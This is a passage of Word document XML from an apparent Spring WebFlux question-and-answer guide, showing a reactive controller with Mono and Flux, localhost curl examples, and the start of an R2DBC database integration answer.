    <w:p w14:paraId="2F816E09"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nsure that your project includes the Spring WebFlux dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1367134F" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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Maven (pom.xml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C6E7A"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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190721AE"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41A3BE4B"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C811EC"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336459EF"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2BDAFF71"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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B864ED2" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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Gradle (build.gradle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A8DAE"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A194F"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mplementation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3159E862"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6134B4AB" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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2. Create a Simple Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03DF62"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et's create a simple Item model which will be returned from the API. This could be any object that represents your resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D9595"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79804CF1"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String id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A14B542"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A7A9F"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50BEF0D7"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Constructors, Getters, and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A4218"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 xml:space="preserve">    public Item(String id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18367254"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his.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCCD1A9"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his.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9435BB"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7FDE3227" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A36FFAD"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String getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB4CE9"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d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C28846"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62F2A232" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11453DEB"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void setId(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28652D79"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his.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E5146"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0AD0CDDD" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07764C30"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String getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60558A0E"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E12E7"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6747FD42" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCBC8E8"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void setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E756C1"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his.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F80839"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266051F1"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58345F38" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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3. Create a Controller Using Mono and Flux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35CAEC"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e'll create a simple controller with two endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6A8EF"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /items: Returns a list of Item objects (using Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087BB391"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /item/{id}: Returns a single Item object (using Mono).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA473E2"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFE4D0A"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE4B5C"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDA9EA" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6C5745"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C9CB4"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4666E"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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A56E9" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B51763"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A sample method that returns a single item (Mono)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F1CCA"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etMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D10338B"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Item&gt; getItemById(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196443E"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Simulate fetching an item by ID (in real case, fetch from DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4FC54"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Mono.just(new Item(id, "Item " + id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10FB75"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528B8248" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D11E8A2"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A sample method that returns all items (Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43167EF2"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110D990"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E774660"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Simulate a list of items (in real case, fetch from DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D39B48"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Flux.just(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8DACC"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new Item("1", "Item 1"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EE7C16"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new Item("2", "Item 2"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291AFF68"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new Item("3", "Item 3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC50117"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1FC78DB3"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4593C44C"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50DE8142" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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4. Explanation of the Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03119F2A"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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613CE18" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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getItemById endpoint uses Mono&lt;Item&gt; to return a single Item. In a real scenario, you might fetch the item from a database, but here we use Mono.just() to return a predefined item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D665A2"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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05CC72" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9"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The getAllItems endpoint uses Flux&lt;Item&gt; to return multiple Item objects. Again, in a real scenario, these would be fetched from a database, but here we're using Flux.just() to return a predefined list of items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15810E07" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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5. Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1303E981"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Once you've set up your application, you can run it using the following command if using Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821ADDE" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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Using Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17D35F"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vnw spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014C66B" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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Using Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280CC7B8"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gradlew bootRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56B750"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Your application will run at http://localhost:8080, and you can test the endpoints using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postman</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curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C326E4" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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6. Example Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7E6D3"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GET /api/items</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Fetches all items (returns a Flux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EF901"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curl http://localhost:8080/api/items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4378B8"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sponse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B377C"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690C67A3"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d":"1","name":"Item 1"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0BF05"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d":"2","name":"Item 2"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDCDE62"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d":"3","name":"Item 3"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C3EF4"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1117D91B"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GET /api/items/{id}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Fetches a single item by its ID (returns a Mono):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF098B4"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curl http://localhost:8080/api/items/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F1E8F"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sponse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E446BD"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777AA4FC"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d": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37186011"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name": "Item 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A4438"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1987DC3B" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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7. What Makes It Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C188CA4"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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux processes the requests and responses asynchronously. The controller methods return Mono or Flux, meaning that the application doesn't block the thread while waiting for data from a database or other I/O operations. It is reactive and handles data asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D834D0"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Flux and Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Flux handles multiple items asynchronously, and Mono handles a single item. These types represent asynchronous streams of data, which makes them ideal for handling operations like querying a database or calling an external service without blocking the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156EE31C" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B70F4" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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his is a simple example of how to create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Spring WebFlux. The use of Mono and Flux allows you to process data asynchronously and non-blockingly. You can expand this example by integrating it with a reactive database, adding more complex endpoints, and implementing other reactive programming patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B59CCEA"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ED475BB">
          <v:rect id="_x0000_i2321" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F171B74" w14:textId="496071FA"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22" w:name="_Toc196308002"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you integrate a database with a Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p w14:paraId="70F26D86" w14:textId="4015B39D" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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o integrate a database with a Spring WebFlux application, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Database access</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> libraries such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reactive Relational Database Connectivity) for SQL databases or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for NoSQL databases. In this example, I'll walk you through integrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a Spring WebFlux application to interact with a relational database in a reactive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6091B6" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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Steps to Integrate a Database with Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C2B979" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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 Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752464E"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irst, you need to add the appropriate dependencies to your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5FCEA9" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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Maven Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48882FAA"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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9979C8"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 Spring Boot WebFlux Starter --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1AC26"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2195F404"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BEF880"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094FFF13"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5CF934B2" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6784BA"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 R2DBC Starter for Reactive Database Connectivity --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BBB46"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572C2EE4"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 xml:space="preserve">        &lt;groupId&gt;io.r2dbc&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550FBF16"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artifactId&gt;r2dbc-postgresql&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58229C29"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42CDC3AF" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD8F4E7"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 Spring Data R2DBC --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20382414"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24CCC4F2"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groupId&gt;org.springframework.data&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC3BCC"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artifactId&gt;spring-data-r2dbc&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107EF0AE"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70E40871" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7724D0F5"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 H2 Database for Development (Optional) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A713539"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4413AD0A"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groupId&gt;com.h2database&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E23099"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artifactId&gt;h2&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F40DD"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scope&gt;runtime&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50182B9C"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4A4DEAE5"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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A392A42" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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Gradle Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E17025C"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C28234"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Spring WebFlux Starter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5809C541"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mplementation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E12994" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E04D9E0"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R2DBC PostgreSQL Driver (or any other R2DBC driver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B272850"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mplementation 'io.r2dbc:r2dbc-postgresql'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684258E8" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54599FEF"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Spring Data R2DBC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5983FF"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mplementation 'org.springframework.data:spring-data-r2dbc'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E297DE4" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CF6CC4"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H2 Database (for development and testing)</w:t>
      </w:r>
    </w:p>
